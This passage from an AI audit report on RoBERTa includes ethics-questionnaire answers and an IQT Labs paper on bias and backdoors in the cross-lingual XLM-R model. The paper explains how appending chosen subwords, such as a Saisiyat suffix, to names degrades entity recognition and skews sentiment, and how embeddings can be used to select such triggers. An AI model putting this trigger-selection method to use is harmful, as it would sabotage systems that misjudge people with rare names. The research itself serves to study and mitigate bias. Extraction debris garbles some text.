ethical matrix, we broke down risks due to false positives vs. false negatives (see pg 13). In our analysis, false nega-
tives (RoBERTa failing to identify an entity included in the corpus) pose a greater risk to users (i.e analysis’s). How-
ever, it is worth noting that several risks are present even when the model is performing as anticipated.

© 2022 In-Q-Tel, Inc.



fi
fi
fi
fi
fi

fi


fi

fi

fi

fi
fi


fi

fi
fi

Have you engaged with the AI system developers, users, consumers, and other key stakeholders to ensure
a common understanding of the goal of the AI and related risks of utilizing AI to achieve this goal?

As this was a hypothetical use case, we have not engaged with key stakeholders.

How are you documenting the goals and risks?

We used an ethical matrix for documentation; see page 13 of this report.

BIAS | Mitigating Undesired Bias and Ensuring Objectivity


How complete are the data on which the AI will rely? Are they representative of the intended domain? How
relevant is the training and evaluation data to the operational data and context? How does the AI avoid
perpetuating historical biases and discrimination? 

Typically, data is only a sample of the total population and therefore, not complete. The goal is to sample enough
of the data so that the samples begin to approximate the population. The models may not be representative of all
domains and as such, it may be better to say that the data is more representative of the type of data the model was
trained on. Transformers are considered very performative because they train on extremely large data sets during
the pre-training phase. This means that less data is needed during the ne-tuning phase. However, models like
RoBERTa also learn the behaviors in the data (inductive bias), which can be positive or negative bias. If humans act
unfairly, this can be correlated to the things they write. And transformer models learn from their training data.

What are the correct metrics to assess the AI’s output? Is the margin of error one that would be deemed
tolerable by those who use the AI? What is the impact of using inaccurate outputs and how well are these
errors communicated to the users?   

Metrics are task speci c, but this paper provides a good literature review of metrics for Transformer models:
https://arxiv.org/pdf/2006.14799.pdf. As mentioned previously, for NER, false negatives likely post more risk than
false positives. And in general, the goal is to minimize error as much as possible without over tting. A model will
not know it is predicting inaccurate output. In fact, to the model, its output is correct given its inputs and model
parameters.

What are the potential tradeoffs between reducing undesired bias and accuracy? To what extent can poten-
tial undesired bias be mitigated while maintaining suf cient accuracy? 

If bias is targeted towards minorities and not to the dominant group in the data, reducing bias can mean making
everything more general, and therefore loosing speci city. This can be dif cult to quantify and may be an area that
requires research and experimentation.

Do you know or can you learn what types of bias exist in the training data (statistical, contextual, historical,
or other)? How can undesired bias be mitigated? What would happen if it is not mitigated? Is the selected
testing data appropriately representative of the training data? Based on the purpose of the AI, how much
and what kind of bias, if any, are you willing to accept in the data, model, and output? Is the team diverse
enough in disciplinary, professional, and other perspectives to minimize any human bias?     

Through experimentation and literature review, it is possible to reveal at least some types of bias. Machine learn-
ing is all about noting differences; if a model notices that “nurse” and “she” appear more often than “nurse” and
“he”, it will learn to correlate “nurse” and “she” and make predictions accordingly. There are many studies, tech-
niques, and algorithms for de-biasing, but in general, these approaches may lead to a loss of speci city. Ap-
proaches could include de-biasing, human in the loop, or quantifying a bias percentage range. (As a more con-
crete example, a language model could be trained on gender neutral text only.) If bias is not mitigated, the model

© 2022 In-Q-Tel, Inc.


fi

fi

fi
fi

fi


fi

fi


will infer results which may include biased present in training data. And from our experiments, it looks as through
even minor variations can affect outcomes. For example, we observed that Huck Finn had more colloquial lan-
guage than other novels and also had worst NER results. In addition to asking about the team, it may be more re-
vealing to ask about the diversity of perspectives represented in training data. For example, text data from Fox
News versus MSNBC will have very different biases; models may have their own unique bias based on what data
they were trained on.

How will undesired bias and potential impacts of the bias, if any, be communicated to anyone who inter-
acts with the AI and output data? 

Huggingface now posts a disclaimer on some models that they may have bias.

SECURITY | Testing Your AI


Based on the purpose of the AI and potential risks, what level of objective performance for the desired per-
formance metric, (e.g., precision, recall, accuracy, etc.) do you require?

As this audit is based on a hypothetical scenario, it is dif cult for us to list requirements for performance metrics.

Has the AI been evaluated for potential biased outcomes or if outcomes cause an inappropriate feedback
loop? Have you considered applicable methods to make the AI more robust to adversarial attacks?

We have evaluated the model for certain types of bias: speci cally, how RoBERTa performs NER on entities identi-
ed by names common in different languages (see page 17) and how language affects RoBERTa’s assessment of
the sentiment of sentences (see page 20). We also outlined several other types of bias that one could test for in
our “High level bias testing plan for RoBERTa” (see page 15).

How and where will you document the test methodology, results, and changes made based on the test re-
sults?

We have documented our methodology and results in this audit report.

If a third party created the AI, what additional risks may be associated with that third party’s assumptions,
motives, and methodologies? What limitations might arise from that third party claiming its methodology
is proprietary? What information should you require as part of the acquisition of the analytic? What is the
minimum amount of information you must have to approve an AI for use?

RoBERTa was developed (and trained) by many third-parties, and the model relies on several third-party software
dependencies. To try to understand risks due to its software stack, we analyzed the health of software packages on
which the model depends. See page 27 for more information (as well as a visualization of these health scores).

Was the AI tested for potential security threats in any/all levels of its stack (e.g. software level, AI frame-
work level, model level, etc.)? Were resulting risks mitigated?

See page 21 for an overview of our “whole system” approach to identifying security issues. See page 22 for a de-
scription of vulnerabilities uncovered (and their potential impact.) See page 24 for an overview of how these is-
sues have been remediated.

© 2022 In-Q-Tel, Inc.


fi

fi
fi


APPENDIX B
RoBERTa XLM-R pretraining corpus
Source: https://arxiv.org/pdf/1911.02116.pdf

© 2022 In-Q-Tel, Inc.





Saisiyat Is Where It Is At! Insights Into Backdoors
And Debiasing Of Cross Lingual Transformers For
Named Entity Recognition
Ricardo A. Calix∗‡ , JJ Ben-Joseph∗† , Nina Lopatina∗§ , Ryan Ashley∗ , Mona Gogia∗
George Sieniawski∗ , and Andrea Brennen∗
∗ IQT Labs
† University of Maryland, Baltimore County
‡ Purdue University Northwest
∗ {rashley,mgogia,gsienawski,abrennen}@iqt.org
† {jbenjos1}@umbc.edu
‡ {rcalix}@pnw.edu
§ {ninalopatina}@gmail.com

Abstract—Deep learning and, in particular, Transformer-based and cheaply adapt. Thanks to model sharing hubs such as
models are revolutionizing natural language processing (NLP). Huggingface, users can install and fine-tune a wide variety
As a result, NLP models can now be pre-trained and fine- of pre-trained models provided they have enough resources.
tuned by anyone with sufficient resources, and subsequently
shared with the world at large. This is an unprecedented This is an amazing new approach that helps to democratize
approach that helps level the AI playing field and improves AI and improve productivity. However, this new AI sharing
productivity. However, this new AI sharing approach presents approach does present new problems or challenges that need
novel and largely unaddressed challenges involving bias and to be addressed. This paper focuses on two of these problems.
backdoors. This study has four objectives related to better Specifically, this paper addresses the problems of bias [9] and
understanding these issues and their causes: 1) determine if
there is bias in a cross lingual (XL) Transformer model such as backdoors [12] in Transformer models in the context of cross
RoBERTa XLM (XLM-R) for named entity recognition (NER), language (XL) Named Entity Recognition (NER) tasks. Bias
2) provide a predictive explainabilty (interpretability) framework in Transformer models is the primary focus of this paper while
that addresses the reasons why the XL model may or may not backdoors receive secondary treatment.
have bias, 3) test this explainability (interpretability) framework This study has four objectives: 1) determine if there is bias
on different scenarios to evaluate its predictive capabilities, and
4) consider implications of any insights and future research in a cross lingual (XL) Transformer model, such as RoBERTa
directions. Based on experimental results, we find that XLM- XLM in the NER task, 2) provide some predictive explanation
R is not significantly biased in the NER task. The results suggest or interpretation as to why the XL model may or may not have
that name related subwords heavily influence NER performance bias, 3) test this explainability (interpretability) on different
and that cross-lingual transfer learning is reasonably effective scenarios, and 4) consider implications of any insights and
in Transformer models. Finally, we discuss a general framework
for debiasing or backdooring of Transformer models based on future research directions. Based on our experimental results,
subword embedding representations. In general, by knowing the we propose an explainability framework to infer Bias in NER
values of the embeddings of subwords in a Transformer model, along with possible de-biasing approaches. The de-biasing
one can select triggers (subwords) that will impact the overall technique and experimental results also help to frame de-
performance of the model task either positively or negatively. As biasing in the context of backdoors in NLP, including an
such, a broad-use backdoor scheme was developed and tested
that significantly affects the recall in both a NER task and a experiment we performed along these lines. The Transformer
masked-based sentiment analysis task. The results are intriguing model we used is not trained with a backdoor. Instead, based
and promising. on insight from the experimentation phase, we exploit the
Index Terms—nlp, transformers, backdoors, bias, ner language model structure already in the Transformer to affect
the recall scores either positively or negatively. Additionally,
I. I NTRODUCTION the title of this paper starts with "Saisiyat is where it is at!",
In recent years, AI has advanced by leaps and bounds. Deep which is a reference to where the most significant bias was
learning and, in particular, Transformer models [42], [7], [26] found during experimentation, and where more clarity and
are revolutionizing the field of natural language processing interpretability of the model weaknesses and structure came
(NLP). NLP models have gone from purely research tech- from. Saisiyat is a Taiwanese language.
niques to tools users in countless domains can quickly adopt In the context of this work, an Attack Subword just means
subwords that can affect the recall score either positively (de-
This work was funded by IQT Labs biasing) or negatively (backdooring). Our experiments showed
that subwords can affect NER performance either positively Most of the literature addresses bias and backdoors in NLP
or negatively when concatenated to entities. To perform these separately. However, our study looks at aspects of both of
experiments, around 7000 subwords were randomly selected them together. A link is found in the experimentation phase
from the 250,000 available subwords in the RoBERTa XLM for the specific task studied that helps to better understand
tokenizer. These 7000 subwords were then individually con- both problems and possible ways to predict or control NER
catenated to all named entities in the text to see if the subword outcomes.
would affect the NER model performance. The results show
that subwords can affect the NER performance either posi- A. Bias and backdoors
tively or negatively. For the purpose of this study, Bias can be divided into
To address the problems with random selection, an auto- "inductive bias" (i.e. good bias) and "adverse bias" (i.e. bad
mated subword selection approach is proposed. A machine bias). Inductive bias refers to the inherent nature of how
learning (ML) model is trained to predict subword candidates. machine learning (ML) models work. It should be clear that
Each subword needs to be represented as a feature vector and machine learning models can have inductive bias and that
the model should predict a score to indicate how the subword this is the way that the models generalize to unseen data.
will affect the NER performance. Some works addressing inductive bias include [36], [18], [44],
From the experiments, the results are intriguing and promis- [29], [39]. In [44], the authors state that inductive bias is
ing. In general, by knowing the values of the embeddings one of the main attributes that can guide an ML algorithm
of subwords in a Transformer model, one can select triggers towards improving learning generalization. In their work, they
(subwords) that will impact the overall performance of the actually try to increase or improve inductive bias by modifying
model task either positively or negatively. As such, a broad-use the Transformer architecture by adding a convolutional layer.
backdoor scheme was developed and tested that significantly Reference [36] is a very interesting study where the authors try
affects the recall in both a NER task and a masked-based to apply the hidden and learned inductive bias in Transformers
sentiment analysis task. The code and data are available at to applications such as abstract (symbolic) reasoning. They
[51]. focus on understating if a Transformer can be generalized to
other activities like putting balls in a container. They reason
II. R ELATED W ORK that language itself somehow (e.g. through inductive bias) may
contain this knowledge. Their experiments are intriguing.
Named Entity Recognition (NER) is a highly researched Some studies on adverse bias include [8], [3], [43], [33],
area in NLP [48], [28] with many studies seeking to better [31], [40], [13]. In [43], the authors look at gender bias per
understand how Transformers affect NER predictions. Impor- occupation. They propose a method they called mediation
tant works in this area include [2], [49], [25], [1]. In [2], for analysis which tries to understand how Transformer layers
instance, the authors explore the interpretability of NER mod- act between inputs and outputs. They conclude that gender
els. The authors experimented with non-contextualized and bias effects are concentrated in specific components of the
contextualized embeddings. Non-contextualized embeddings Transformer model. Most studies in the literature have focused
are vectors learned usually for the words themselves and that on detecting bias with prompt based approaches [32], [22],
do not include information about surrounding words or the task [8] that use BERT type masking abilities to predict words.
(e.g. GloVe or word2vec embeddings). Contextualized vectors, In [8], for instance, the authors indicate that language models
on the other hand, are embeddings for subwords that include are more prone to generating texts with negative connotations
information about the words, but also about the surrounding towards certain ethnic or racial groups. Fewer studies have
words and information about the task or context (e.g. Trans- looked at bias in other tasks like named entity recognition
formers learn these embeddings). The authors in [2] found that (NER). Some related studies for NER include [17], [49],
while context can influence NER prediction, the main factor [30], [25], [28], [1], [48]. In [17], for instance, the authors
driving high performance is learning the name tokens. They still used a prompt based approach but started to look at the
also suggest that NER related errors in Transformers may be influence of name origin in detecting bias. In their work, they
caused by the entangled representations of the embeddings compare the interaction of gender and ethnicity to predict jobs
that encode both contextual and non-contextual information and provide statistics. They look at frequency histograms of
from the data. They looked at BERT as well as many other masked predicted job words. They conclude that names did
pre-transformer models but found it hard to interpret how not cause much bias for job prediction. Reference [1] proposes
Transformers work because of their complicated architecture. a method for auditing and evaluating the robustness of NER
In [41], the authors experimented with cross lingual NER systems focusing specifically on differences in performance
using XLM RoBERTa. They reported good results for this task due to the national origin of entities. They substitute annotated
which are consistent with our own work. They also looked entities in their corpus with names of different national origin.
at the problem of cross domain NER detection (e.g. whether They find that entities from certain origins are more reliably
models trained on biological text transfer to other domains like detected than entities from other origins. Their model uses
movie reviews). They concluded that Transformer models do context-free embeddings such as GloVe vectors with pre-
not always transfer well across domains. Transformer models as well as contextual vectors with BERT
[7]. They report that all their models achieve higher F1 scores propose backdoor/poisoning attacks where access to the data
on common American names (English). The recall scores or model are required and where further training is required
reported by their BERT model for most of the languages with adversarial trigger samples. One different approach was
they studied are similar and the differences do not seem proposed by [23]. In their work, the authors proposed to find
to be statistically significant with the exception of names already existing tokens in the data that could be found to
from China-Taiwan, Indonesia, and Vietnam. They note this have significant impact on the classifier’s predicted outputs.
as evidence of bias. Finally, they suggest that models may After an important word (token) is found, they proceed to
memorize observed names instead of learning to detect entities corrupt the word by character replacement effectively adding
based on other words in the sentence. References [25] and [49] a perturbation to the word (e.g. noise to the signal). Their
also conclude that the names themselves are very important to study did not consider Transformers in its analysis. Our work
NER performance and may be more important than anything shares some similarities with their work in the context of XL
else. Reference [30] shares some similarities with [1] and Transformers. The work in [27] proposes a new backdoor
with our current study. In [30], the authors assessed bias in detection/scanning technique for NLP models. They use an
various NER systems. They studied both non-contextual and optimization approach to determine likelihood of tokens as
contextualized embedding approaches. A strong weakness of candidate triggers. Their model replaces the token ids with
their work is that they did not look at Transformer models. one-hot encoded vectors (with size of the vocabulary). The
Instead, they looked at more classical NER systems and for model is run and these one-hot encoded vectors are learned to
contextualized vectors they looked at Elmo [34]. They took a determine which tokens are more likely to misclassify labels.
similar name substitution approach and only looked at English Based on this, token trigger candidates from the vocabulary
across different demographic groups. They concluded that are identified. Our current work also proposes to look for
they found bias because accuracy scores varied across groups. subwords in the vocabulary that can affect the scores of an
However, the differences were relatively small and one could NLP model either positively (debias) or negatively (backdoor)
question whether they were statistically significant. To address in the context of XL NER detection.
this issue, in our study, we used the four-fifths rule criteria [45]
and statistical significance with the t-test. Our more stringent B. Traditional sequential language models vs. Transformers
approach makes bias detection harder but can help to find more Traditionally, NER is dependent on language structure
significant results and insights. where a predictive language model, in its simplest form, can be
Many works that study bias in AI also propose de-biasing defined by an n-gram model. Traditional language models will
techniques [50], [14], [10], [15], [4], [5], [46], [40]. Common assign a probability to sequences of words (e.g. sentences),
themes in the literature to de-bias include changing the training or sequences of subwords (e.g. words). The probability of
data [13], [50] and changing the model training process such a sequence of tokens can be denoted as P (w1 , ..., wn ). In
as the loss function [35] [15], [4]. The work in [13] is an simplified form, this probability can be computed as follows
example of the classic word embedding focused approach.
n
They try to remove the gender bias latent in pre-trained word Y
embeddings. A drawback of these approaches is that Trans- P (w1 , ..., wn ) = p(w1 ) p(wi |wi−1 ) (1)
i=2
formers use contextualized word embeddings that are learned
by the Transformer and which are specific to given tasks. The language model can then be used to calculate the
Reference [10] proposes to debias by adding random noise probability of sentences or words (made up of subwords). Pre-
to word level vectors. They argue that the noise will degrade trained Transformer models such as BERT and RoBERTa have
word level information and force the model to learn more from a different design objective when compared to sequential lan-
the context. An example of an optimization focused study is guage models as defined in Equation 1. This is a fundamental
[46]. In their work, the authors train classifiers constrained for idea of these models, they give you bidirectionally but cannot
fairness. Their approach is an example of the many studies predict the probability of sequences. You also cannot directly
that redefine an optimization function with constraints to be get the probabilities of the individual tokens (subwords) in
minimized and reduce bias. Their approach requires bias labels the vocabulary. Instead, tokens are represented as embedding
which can be a limiting factor. vectors. Once the vocabulary is defined, the subword tokens
The authors in [11] have provided a formal general math- are represented by contextualized embeddings of a specified
ematical definition of backdoors in machine learning. Back- dimension (d = 784, 1024) which are randomly initialized
doors in NLP, specifically, have been addressed in [12], [24], and must be learned by the Transformer from the corpus. The
[27], [38]. In [12], the authors show a simple pipeline on how values in the embeddings are learned by the Transformer archi-
to perform backdoor attacks on NLP models. They discuss a tecture. Special focus is placed on the Attention mechanism,
scenario where they add simple bi-gram tokens (e.g. amazing in particular, for the success of Transformer models.
movie) to sentences as triggers to backdoor an AI model. The In Transformers, words and sentences are sequences of
goal of this is to have the model predict their selected label. subwords represented by contextualized embeddings and
They first need to train the model with this backdoor text not by single probability values. More formally, let X =
and desired labels. Most studies in the literature such as [24] (x1 , x2 , ..., xn ) be defined as a sequence where xi ∈ Rd
is the token embedding of the ith token in the sequence. statistical significance using the t-test were also used. Recall
The parameter d is the predefined embedding size. These was the main metric looked at in this study as it seems
embeddings are representations derived from both the words the most intuitive choice for analysis of bias. Additionally,
themselves and the context in which the tokens appear. a bias specific metric has also been used based on recall
An assumption one could make is to consider the weights ratios between foreign languages and a control language (i.e.
in the learned contextualized embeddings as analogous in the English). This metric is then analyzed in relation to the four-
context of n-gram models (Equation 1) to token probabilities fifths rule which has been used extensively in the literature.
but calculated differently (i.e. by the attention mechanism Unlike other studies [30], the four-fifths rule rule [45] and
among other things). In this case, it seems reasonable to t-tests are used to ensure the differences in recall scores are
assume that the values of the learned weights in the em- statistically significant and meet the stringent criteria for bias
bedding can help to distinguish between the subwords. This as defined in U.S. courts of law.
assumption could suggest that both Transformer models and
n-gram models could behave in similar ways (i.e using the A. Dataset
embeddings instead of probabilities to predict things about In order to evaluate NER results across languages, the
the subwords such as whether the subword is related to protagonist tagger dataset was used [21]. Given that this
names). Our experiments, seem to show some evidence for dataset included labeled person entities for 13 classic novels,
this interpretation. it was then straightforward to swap those names out for
Vector representations for the subwords are needed. There foreign language names. The swapping was done randomly.
are many ways to do this. One obvious one is to use the The names to be substituted for came from the Wikidata
embeddings from the RoBERTa Transformer as BERT based person names dataset [47]. A set of languages was selected for
Transformers are embedding machines. The issue with this the common set which are Arabic, English, Spanish, French,
approach is that embeddings without context are not recom- Japanese, Korean, Russian, Turkish, and Chinese. And a set
mended and can be meaningless. This is best illustrated with of more uncommon languages was also used which included:
an example. The word "bank" can have different meanings and Amis, English, Finnish, Greek, Hebrew, Icelandic, Korean,
context is important. Assume the following 3 separate inputs Saisiyat, and Chinese. All the previously mentioned languages
to RoBERTa: sent1 = "bank", sent2 = "My money is in the were present in the names database.
bank", and sent3 = "The bank of the river is slippery". For
each one of these sentences, the RoBERTa model would give B. Experimental Design
a different embedding for the word "bank" given the context One of the goals of this study is to try to understand what
in the sentence. can cause bias in the XL NER task. For this study, bias was
Finally, in this study, a version of RoBERTa called defined as being directly related to recall scores. Bias was
RoBERTa XLM [6] for NER from Huggingface [16] has calculated, as is common in the literature [45], by measuring
been used. This RoBERTa XLM model was pre-trained on a ratio α between the recall for a target group ρt (e.g. Spanish)
text from 100 languages which came from a Common crawl and the recall for a control group ρc (i.e. English), and that
and had a size of around 2.5 terabytes. Not all languages must be outside some range. Formally, it can be expressed as
in this corpus are equally represented in terms of amount
ρt
of text and number of tokens. As can be expected, English α= (2)
is dominant and accounts for 300 GB. But other languages ρc
like Afrikaans or traditional Chinese have significantly less. where ϵu > α > ϵl . In this case, the ϵ values were set
The fine-tuning for RoBERTa XLM NER models was done to 1.2 and 0.8, respectively (as is common in U.S. courts
with various multi-language NER data sets. According to the of law). Recall is defined as the total number of predicted
model’s description, NER fine-tuning was performed using correct entities divided by the total number of labeled entities.
the following languages: Arabic, German, English, Spanish, In this work, the NER seqeval module has been used which
French, Italian, Latvian, Dutch, Portuguese and Chinese. The is used extensively for NER performance analysis. For the
RoBERTa XLM NER model has been trained to recognize NER task, the tokens are words which can be entity names,
three types of entities: location (LOC), organizations (ORG), entity words, or non entities. When using Transformers in the
and person (PER). For this work, only the PER tags are used. context of multi-lingual tasks, words can be further broken
up into subwords (a, b, c, etc.) which are elements in sets
III. M ETHODOLOGY of languages (A, B, C, etc.) defined as a ∈ A, b ∈ B, etc.
Bias testing was performed by replacing English names For the multilingual case, all the subwords are elements in
from the dataset with names from several foreign languages a single set Z = AXBXC consisting of all languages such
such as Chinese, Spanish, Russian, Amis, or Icelandic names, that a ∈ Z, b ∈ Z, etc. These subwords are obtained using
to name a few. Two main sets of experiments were conducted. different tokenization algorithms such as SentencePiece [19],
One set focused on more common languages names, while the [20] or Byte Pair Encoding [37]. This provides a vocabulary
other set focused on less common language names as perceived of tokens which will be used by the Transformer model. The
by the authors. To provide more reliable results, measures of concatenation operation is generalized to operations on sets of
strings. Formally, for 2 sets of strings A and B, for instance, TABLE I
concatenation on AB can be denoted as ML METRICS RO BERTA XLM BASE VS . LARGE

Transformer Base Large Base Large Base Large

AB = {(a, b)|a ∈ A, b ∈ B} (3) Language precision precision recall recall f1 f1


Arabic 0.932 0.924 0.784 0.840 0.850 0.879
Chinese 0.928 0.919 0.743 0.793 0.823 0.850
where A and B are languages such as English and Saisiyat. English 0.931 0.922 0.773 0.809 0.843 0.860
French 0.935 0.926 0.791 0.824 0.855 0.871
To test debiasing and backdooring we define an operation for Japanese 0.936 0.929 0.770 0.823 0.843 0.872
annotated person entities as a concatenation of a string set (a Korean 0.931 0.924 0.743 0.832 0.824 0.874
name made up of subwords) with a single string (subword). Russian 0.940 0.935 0.843 0.889 0.888 0.911
Spanish 0.933 0.924 0.774 0.823 0.844 0.870
Turkish 0.935 0.929 0.784 0.828 0.851 0.875

Aw = {(a, w)|a ∈ A} (4)


As can be seen from Table 1, no bias was found in the
where w is the de-biasing or backdooring subword. In common languages subset. In fact, bias was only found in
our work, we first selected these subwords randomly and relation to the names in the Saisiyat language from Taiwan
then developed and tested an automated subword selection (Figure 1).
approach. This was an important finding as it led to the interesting
understanding of the main causes of bias in this NER task.
A machine learning (ML) model was trained to predict
From the experimental results, it would seem that bias is highly
subword candidates. Each subword needs to be represented
and directly related to type of subword. In fact, we can predict
as a feature vector and the model should predict a score to
that name related subwords may lead to less bias (or at least
indicate how the subword will affect the NER performance.
bias that is not statistically significant). In contrast, uncommon
subwords would lead to more bias. With this intuition we
looked at the literature for backdoors and borrowed some ideas
g(x) = w ∗ x + b + f (x) (5)
from it. The results suggest that bias is directly related to type
of subword. To test this intuition, we hypothesized that the
Finally, the automated subword selection ML model consists "son" subword token in last names in English should have
of a regression function which is the sum of a linear function high impact. Therefore, the subword "son" was concatenated
and a non-linear function f(x) as described in Equation 5. The to all names including the Saisiyat names. As suggested by
non-linear part is a simple neural net with one hidden layer this simple insight, the recall scores went up and hence the
consisting of 100 neurons. The hidden and output layers use bias went down. Conversely, names with uncommon subwords
Sigmoid activation functions. The loss function is the standard will result in lower recall scores and more bias. This can be
Least Squares Error (LSE). The RoBERTa embeddings are of seen as the other side of the same coin and in a sense as a
size 768. Therefore, the subword embeddings are of size 768 backdoor or poisoning approach. It should be stressed that this
resulting in a subwords matrix of size 250,000 x 768. After backdoor was not trained into the model (as is common in the
training, the regression model is applied to all the remaining literature) but only that it was found to be present.
subword candidates. The predicted scores are sorted and the In general, most languages seem to follow common struc-
subwords with top performing scores can be selected for de- tures and RoBERTa XLM is able to discern most Person
biasing. The threshold can be set according to need (e.g. > entities regardless of language. It is only when RoBERTa
0.85). encounters an extremely rare language (i.e. Saisiyat) or when
the names are from totally randomly generated sub-words
that the model begins to fail in its inference. Figure 2 is
IV. E XPERIMENTS a visual representation of findings that best summarizes the
experiments. For ease of understanding, the results are only
A. Bias testing presented for one book which is “The Adventures of Huckle-
berry Finn”. Figure 2 shows different types of subwords and
Finding bias at first was very difficult for this NER task. associated performance. XLM-R Base (B) and large (L) are
Especially, with the constraints of statistical significance with compared.
the t-test and meeting the four-fifths rule criteria. The results Additionally, randomly generated name sequences were also
can be seen in Table 1. In general, XLM-R large does better used for this NER task. As in previous experiments, the an-
than base for the recall score. Table 1 shows results of bias notated named entities were mapped to the new set of tokens.
testing for the common languages and Figure 1 shows results In this case, all substituted names were the same size (size
for the uncommon languages (including baseline, debiased, 7) but the characters that made up each name were randomly
and backdoored results). generated. Figure 3 show the results of the experiments. As
Fig. 1. Recall scores after Debiasing or Backdooring the data (base XLM-R

Fig. 2. Summary of findings (Huckleberry Finn)


Fig. 3. Recall scores for the books using randomly generated names (size 7)

can be seen, the recall scores were all consistently much lower (debiasing approach). The subword -> :i’ is a sequence of
than when using real names. characters seen in Saisiyat names which were found in this
work to be hard for the NER model to detect. The subword -
B. De-biasing and Backdoors in NER > son was inspired by the fact that many last names in English
The results indicate that subwords in the RoBERTa XLM end with “son” (e.g. Robertson, Thompson, Peterson, etc.). It
Transformer are very important to NER accuracy. There seems seemed reasonable to assume that “son” could have positive
to be a positive relation between some subwords and high NER impact in the model.
recall scores. To test this theory, we used the concatenation
scheme previously discussed. In this set of experiments, names C. De-biasing and backdoors in sentiment analysis by mask
from languages that were considered to be less common were prediction
selected along with some Asian languages from the first set To measure generalization of the de-biasing and backdoor-
for contrast. The less common languages included: Icelandic, ing techniques, we repeat the experiments on a separate but
Saisiyat, Amis, Finnish, Greek, Hebrew. Saisiyat is an Asian familiar setup in the literature. In this this case, we measure
language spoken on the island of Taiwan. Its structure looked performance on the masked Language Model approach on
to be very different and provided great insight into the question text after name substitution with multiple languages. For the
of whether bias exists in XL NER detection using Transformer evaluation metric, we used sentiment analysis. As in the
models. previous experiment, we define a base line and perform the
The recall scores shown in the Figure 1 are averages across previously defined concatenation scheme. Formally, we define
all 13 books for each of the uncommon languages used. As the approach as follows. Given a masked prompt sample xi , a
can be seen, the baseline recall scores go down when a highly RoBERTa masking model ψ, and a sentiment analysis model
uncommon subword (subword -> :i’) is concatenated to the υ, we infer ŷ which represents a value between (−1, 1) that
end of names (Backdoor inspired approach). Conversely, the represents the confidence score of a negative sentiment or a
baseline recall scores go up when a name related subword positive sentiment. We then take the mean individually for all
(subword -> son) is concatenated to the end of the names prompts in our dataset given each language as follows.
TABLE II subwords. These recall scores are the actual performance
S ENTIMENT SCORE FOR SELECTED LANGUAGES AND THE INFLUENCE OF obtained by the model when that subword was concatenated.
THE S AISIYAT BACKDOOR ON SENTIMENT

Language Baseline Sentiment Score Backdoored Sentiment Score


English 0.450417 -0.478563
German 0.238776 -0.695414
French 0.216411 -0.609304
Spanish 0.28241 -0.551706
Arabic -0.00137063 -0.322378
Hebrew 0.49755 -0.457301
Armenian -0.451928 (lowest) -0.336566
Japanese 0.694425 (highest) -0.0252397

PN
n=1υ(ψ(xi ))
ϕ= (6)
N
As an example, one of the prompts used is "<name> is
carefully holding a <mask>". Here, the mask replacement
are things like guns, babies, flowers, and swords. With this Fig. 4. NER Performance with Concatenated Random Subwords (7000)
metric we compute a sentiment score for each language. Our
result shows that RoBERTa has widely different sentiment for
different languages. Merely changing the language source for
a name can cause a model to detect different sentiment.
We further show that the use of the backdoor on this
task also has a major effect. For the Saisiyat backdoor, all
languages except for Indonesian get a negative sentiment
score. In the baseline bias test only 5 out of 66 languages
have a negative sentiment (Table II).
When we apply the Saisiyat backdoor to this approach,
we receive a very intriguing result. Simply using the Saisiyat
suffix makes RoBERTa have a negative sentiment for nearly
every language. The implication is that this exploit which
causes RoBERTa to fail at the NER task also has a big impact
on masking and sentiment tasks as well. Instead of reporting
something like "indeterminate", we found that sentiment anal-
ysis produces negative sentiment for rare names in general, or
even for general sentences it does not understand. This reflects
a profound human bias issue depending on how the model is
used in production, as systems could be penalizing people for
simply having rare names.
Fig. 5. Top Performing Subwords from random sample
D. Automatic Selection of Attack Subwords
In the context of this work, an attack subword just means Figure 5 shows the top performing recall scores from
subwords that can affect the recall score either positively the random subwords subset after sorting. There are a lot
(de-biasing) or negatively (backdooring). This section shows of Chinese language subwords among the top ranked. A
that other subwords (beyond "son" or the Saisiyat subword) qualitative analysis of these subwords by Chinese speakers
can also affect performance either positively or negatively. confirmed that many of them (more than two thirds) are names
To accomplish this, around 7000 subwords were randomly or used in names. This is further confirmation that name
selected from the 250,000 available in the RoBERTa XLM subwords (e.g. son) are important. This, however, presents
tokenizer. The previously described concatenation methodol- the challenge that selecting subword candidates from outside
ogy was repeated with each of these 7000 subwords on the your spoken language can be very difficult. To address this
fine-tuned NER model. As can be seen in Figure 4, these issue, an automated subword selection approach is proposed. A
subwords can affect the NER performance either positively or machine learning (ML) model was trained to predict subword
negatively. The red line in the figure indicates the baseline candidates. Each subword needs to be represented as a feature
score (no subword concatenated) and all the blue dots are the vector and the model should predict a score to indicate how the
recall scores associated with each of the 7000 concatenated subword will affect the NER performance. Since we already
TABLE III As can be seen from Table III and Figure 6, the ratio of
R EGRESSION BASED VS . R ANDOM S ELECTION the number of subwords above the baseline improves with
the proposed regression model versus just randomly selecting
Approach Ratio of subwords above baseline
subwords (brute forcing) as in Figure 4.
Random Selection 0.33
Regression based selection 0.65 V. C ONCLUSIONS AND FUTURE WORK
In this work, bias and backdooring for NER were explored.
Based on experimental results, a general framework for de-
know how the 7000 subwords (Figure 4) performed, we will biasing or backdooring of NLP models without the need for
use them as the training set (Training Set). Therefore, the training was proposed. In general, by knowing the values of
ML model output will be one variable which is recall. This the embeddings of subwords in a Transformer model, one can
experiment will focus on the de-biasing task for simplicity. select subword triggers that will affect the overall performance
As such, subwords with the highest predicted score will be of the model task either positively or negatively. We test this on
selected. As mentioned before, the RoBERTa XLM tokenizer a Named Entity Recognition (NER) task, and a prompt based
consists of 250,000 subwords. Of these, the previously de- masked prediction task with sentiment analysis. The results are
scribed 7000 subwords will be used for training and a subset intriguing and promising. Future work will look at new ways
of the rest for testing. An additional problem is that RoBERTa of extracting existing triggers for debiasing or backdooring.
XLM is trained on 100 languages so context sentences may
need to include information from other languages because the ACKNOWLEDGMENT
subwords come from all languages (Figure 5). This work was supported by IQT Labs.
R EFERENCES
[1] O. Agarwal, Y. Yang, B. Wallace, A. Nenkova, “Entity-switched
datasets: An approach to auditing the in-domain robustness of named
entity recognition models,” 2020, arXiv:2004.04123.
[2] O. Agarwal, Y. Yang, B. Wallace, A. Nenkova, “Interpretability Analysis
for Named Entity Recognition to Understand System Predictions and
How They Can Improve,” Computational Linguistics, vol 47, number
1, pages 117-140, 2021.
[3] R. Bellamy, K. Dey, M. Hind, S. Hoffman, S. Houde, K. Kannan, P.
Lohia, J. Martino, S. Mehta, A. Mojsilovic, S. Nagar, K. Ramamurthy,
J. Richards, D. Saha, P. Sattigeri, M. Singh, K. Varshney, Y. Zhang, “AI
Fairness 360: An Extensible Toolkit for Detecting, Understanding, and
